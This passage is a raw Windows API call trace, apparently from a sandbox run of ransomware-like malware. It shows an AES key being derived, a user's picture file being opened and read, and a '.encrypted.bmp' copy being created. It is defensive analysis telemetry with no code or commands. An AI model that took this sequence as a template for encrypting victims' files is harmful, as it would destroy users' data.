wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.797] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.797] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.797] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.797] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.797] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.798] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.798] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.798] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.798] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.798] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.798] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.798] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.799] CryptDestroyHash (hHash=0x7c2240) returned 1 [0040.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\jmlqzshsnywrowx4c3m9.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.799] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.799] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0040.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.801] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci")) returned 0x10 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\jmlqzshsnywrowx4c3m9.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.802] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.803] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.803] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.803] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.804] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.804] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0040.806] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x7d10, lpOverlapped=0x0) returned 1 [0040.807] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17d10) returned 0xac2018 [0040.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17d10) returned 0x935008 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.811] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17d10) returned 0xac2018 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.811] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.811] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.811] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) 